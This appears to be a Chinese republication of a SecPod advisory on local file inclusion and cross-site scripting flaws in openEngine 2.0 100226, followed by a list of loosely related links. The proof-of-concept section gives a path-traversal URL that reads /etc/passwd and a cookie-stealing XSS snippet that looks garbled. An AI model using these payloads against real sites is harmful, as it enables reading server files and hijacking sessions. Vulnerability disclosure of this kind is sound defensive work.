openEngine 2.0 100226 本地文件包含和跨站脚本漏洞
openEngine 2.0 100226 本地文件包含和跨站脚本漏洞 篇1
[+]info:
~~~~~~~~~
openEngine 2.0 100226 LFI and XSS Vulnerabilities
Vendor : www.openengine.de
Advisory : secpod.org/blog/?p=152
secpod.org/advisories/SECPOD_Openengine_LFI_XSS_Vuln.txt
Version : openEngine 2.0 100226; other versions may also be affected.
Download : www.openengine.de/download/openengine20_100226.zip
Date : 11/16/
[+]poc:
~~~~~~~~~
* local file inclusion,
localhost/cms/website.php?template=../../../../../../../../etc/passwd%00
* XSS,
alert(document.cookie)localhost/cms/website.php?template=
[+]Reference:
~~~~~~~~~
secpod.org/advisories/SECPOD_Openengine_LFI_XSS_Vuln.txt
【openEngine 2.0 100226 本地文件包含和跨站脚本漏洞】推荐阅读:
DISCUZ X1.5 本地文件包含漏洞06-01
Linux Kernel ELF文件跨区域映射本地拒绝服务漏洞05-26
IM+本地明文用户名口令泄露漏洞08-06
FreeBSD I386SetLDT多个本地拒绝服务漏洞07-30
本地定位05-29
本地人口08-15
本地市场效应05-01
无线本地通信05-13
本地恢复策略06-24
本地内联网09-12